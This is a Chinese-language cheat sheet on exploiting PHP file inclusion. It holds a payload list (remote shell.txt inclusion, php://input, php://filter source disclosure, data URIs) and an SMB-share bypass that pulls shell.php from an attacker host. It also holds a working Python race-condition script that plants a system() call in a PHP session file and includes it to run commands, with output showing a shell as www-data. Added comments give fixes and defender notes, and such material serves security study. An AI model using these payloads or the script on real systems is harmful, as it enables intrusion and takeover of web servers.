关于文件包含

文件包含

相关基础

# 示例源码
<?php
// Textbook file inclusion: the `pages` query value reaches include() unchanged, so the
// client decides which file is executed (and, with allow_url_include=On, which URL).
// Fix: map the request value onto a fixed allowlist of page files; never pass it through.
include($_GET['pages']); ?>

# 相关函数
include()
require()
include_once()
require_once()

# 利用
    远程代码执行
        /?file=[http|https|ftp]://example.com/shell.txt
        需要 allow_url_fopen=On
    利用php流input代码执行
        /?file=php://input
    利用php流filter读取任意文件
        /?file=php://filter/convert.base64-encode/resource=index.php
    利用data URIs
        /?file=data://text/plain;base64,SSBsb3ZlIFBIUAo=
    利用XSS执行任意代码
        /?file=http://127.0.0.1/path/xss.php?xss=phpcode
        需要 allow_url_fopen=On

利用 SMB 绕过 allow_url_include、allow_url_fopen 的限制

# 漏洞文件
<?php
// Minimal include target used for the SMB example: the source is shown to the
// visitor, then whatever the `file` query parameter names is included.
highlight_file(__FILE__);
// Untrusted: copied verbatim from the query string, no allowlist or path check.
$a=$_GET['file'];
// Sink. The example below feeds a UNC path (\\host\share\file) here; per this page
// that still works with allow_url_include and allow_url_fopen both Off, so those
// settings alone are not a mitigation — validate $a against known page names.
include($a);
?> 

# allow_url_include、allow_url_fopen 都为 Off 时仍可实现绕过

# 配置
# impacket smbserver.py: exposes /root/Desktop/tmp as the share "shivers" so the
# target's include() can read a UNC path from it.
# Defender note: this depends on the web server being able to open outbound SMB
# (tcp/445) to an arbitrary host; egress filtering on the web tier, plus alerting on
# outbound SMB from it, blocks and surfaces this variant.
smbserver.py -debug -smb2support -comment "shivers" shivers /root/Desktop/tmp

# 访问
http://localhost/lfi.php?file=\\192.168.253.128\shivers\include\shell.php

https://xz.aliyun.com/t/5139

包含session文件实现getshell

# 前提
phpinfo.php 
'''
| session.save_path | /var/lib/php/sessions | # session文件保存路径
...
| session.use_strict_mode | 0    | # 为 0 表示服务器接受 Cookie 中任意的 session id（攻击者可控）
'''

# 漏洞文件
include.php:
 <?php
    // CTF-style include target: prints the flag hint, then includes a path built
    // from the POST body if that path exists.
    highlight_file(__FILE__);
    echo "your flag is in some file in /etc ";
    // NOTE: assigned to $fielf, but the variable-variable below reads $field, which
    // is never set in this file (typo in the original source).
    $fielf=$_POST["field"];
    // The "/tmp/" prefix is not a containment check: a `cf` value starting with
    // "../" walks out of /tmp, which is what the session-file script below relies on.
    // Fix: reject `cf` values containing a path separator or "..", or realpath() the
    // result and require it to stay under /tmp/.
    $cf="/tmp/".$_POST['cf'];
    
    if(file_exists($cf)){
        // Sink: any existing file the web user can read is parsed as PHP here.
        include $cf;
        echo $$field;
        exit;
    }
    else{
        echo "";
        exit;
    }
?> your flag is in some file in /etc

# 脚本

#coding=utf-8
import io
import requests
import threading
# Attacker-chosen PHPSESSID. It is honoured only because session.use_strict_mode=0
# (see the phpinfo excerpt above); with strict mode on, an uninitialised id is
# rejected and a server-generated one is issued instead.
sessid = 'shivers'
data = {
    # Walks out of the "/tmp/" prefix that include.php prepends, into
    # session.save_path (/var/lib/php/sessions), to the file PHP writes for this id.
    "cf": "../../../../var/lib/php/sessions/sess_" + sessid
    }

def write(session):
    """Keep the session file populated.

    Each upload carries PHP_SESSION_UPLOAD_PROGRESS, whose value PHP stores in the
    session file under an upload_progress_* key (see the session dump below), so
    the file repeatedly comes into existence with that value inside it.
    """
    for _ in range(10):
        # 50 KiB body; presumably sized so the upload stays in progress long enough
        # for read() to win the race — not tuned further here.
        f = io.BytesIO(b'a' * 1024 * 50)
        # resp is never inspected; the writer only cares about the side effect on disk.
        resp = session.post( 'http://192.168.253.128/include.php', data={'PHP_SESSION_UPLOAD_PROGRESS': '''isTAG<?php system("id")?>'''}, files={'file': ('shivers.txt',f)}, cookies={'PHPSESSID': sessid} )

def read(session):
    """Race the writer: ask include.php to include the session file and look for
    the TAG marker, which only appears in the response if the file was included
    while it still existed.
    """
    for _ in range(10):
        resp = session.post('http://192.168.253.128/include.php', data=data)

        if 'TAG' in resp.text:
            print(resp.text)
            # `event` is a module global created in __main__; nothing waits on it,
            # so clearing it does not stop the other threads.
            event.clear()
        else:
            print("[+++++++++++++]retry")
            
if __name__=="__main__":
    # Created and set here, cleared in read(), but never waited on anywhere.
    event=threading.Event()
    with requests.session() as session:
        # Nine writer threads, then nine reader threads (range(1,10)), all sharing
        # one Session; none of them is joined before the `with` block exits.
        for i in range(1,10): 
            threading.Thread(target=write,args=(session,)).start()

        for i in range(1,10):
            threading.Thread(target=read,args=(session,)).start()
    event.set()


# 产生的session文件格式
'''
upload_progress_isTAGuid=33(www-data) gid=33(www-data) groups=33(www-data)
|a:5:{s:10:"start_time";i:1621313921;s:14:"content_length";i:51480;s:15:"bytes_processed";i:5251;s:4:"done";b:0;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:4:"file";s:4:"name";s:11:"shivers.txt";s:8:"tmp_name";N;s:5:"error";i:0;s:4:"done";b:0;s:10:"start_time";i:1621313921;s:15:"bytes_processed";i:5251;}}}
'''

https://www.freebuf.com/vuls/202819.html

利用PHP自包含getshell

https://www.anquanke.com/post/id/153376#h2-7
